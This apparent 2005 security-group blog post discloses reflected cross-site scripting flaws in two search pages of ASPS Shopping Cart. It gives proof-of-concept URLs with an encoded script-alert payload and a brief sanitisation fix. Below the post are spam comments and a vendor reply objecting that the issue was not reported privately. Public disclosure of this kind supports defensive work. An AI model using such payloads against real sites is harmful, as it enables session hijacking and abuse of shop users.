by r0t,der4444,cembo,VietMafia

Saturday, December 03, 2005

ASPS Shopping Cart Professional and Lite XSS vuln

ASPS Shopping Cart Professional and Lite XSS vuln
Vuln. dicovered by : r0t
Date: 3 dec. 2005
Vendor:http://www.aspsolutions.com.au/
affected version:
ASPS Shopping Cart Professional 2.9d and prior
ASPS Shopping Cart Lite V2.1 and prior


Product Description:
Developed using asp/vb scripting – full source code supplied without encryption , complete cms, helpdesk to log enquires, Unlimited number of categories/subcategories, products and currencies , Innovative Studio online browser , No dll's to install , Supports access 2000 or above (sql server v7+ will be available by 30th April - If you require this urgently please email us as we can sell you our current version which is close for release). , Easy to alter language files and template design , Supports most ssl certificates (please let us know if your certificate is not supported as we aim to support as many as we can) , Credit card details encrypted for added security , Multiple super administrators and standards administrators , Reward your clients sale points which can be used for purchasing , Invoice your clients using your shopping cart for a payment methods including recurring payments (great for hosting invoices) , Create promotional discount coupons for clients. optional - add web wiz forum to cart



Vuln. Description:
Input passed to the "srch_product_name" parameter in "adv_search.asp" and "b_search" parameter in "bsearch.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:
/products/adv_search.asp?srch_product_name=
%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript
%3E&srch_product_price1=&srch_product_price2=
&srch_product_stocknumber=&srch_product_cate
gory=&advance_submit=Search


/products/bsearch.asp?b_search=%3Cscript%3Ea
lert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7


Solution:
Edit the source code to ensure that input is properly sanitised.

3 Comments:

Blogger Credit Center told...

Hey, you have a great blog here! I'm definitely going to bookmark you!

I have a credit cards for bad credit site/blog. It pretty much covers credit cards for bad credit related stuff.

Come and check it out if you get time :-)

7:03 PM

 
Anonymous Peter told...

I am site owner for asps shopping cart. It would had been good if you had emailed this issue to me.

Anyway the next version will have this fixed.

Thanks

9:52 AM

 
Blogger answer-man told...

enjoyed the subject matter on your blog. I have some super great shopping malls to share please take a moment to see which one you like the best.
www.Christmas-Mall-Online.com
www.ShopBeachCity.com
www.American-Shopping-Mall.com
www.tshirtapperal.com
www.biblemediadvd.com
www.bibledvdonine.com
www.handbagexpress.com
www.vegastours.com
www.satellie-dish-network-tv-movies.com
Be sure and take advantage of the great values available. Enjoy!

5:57 AM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew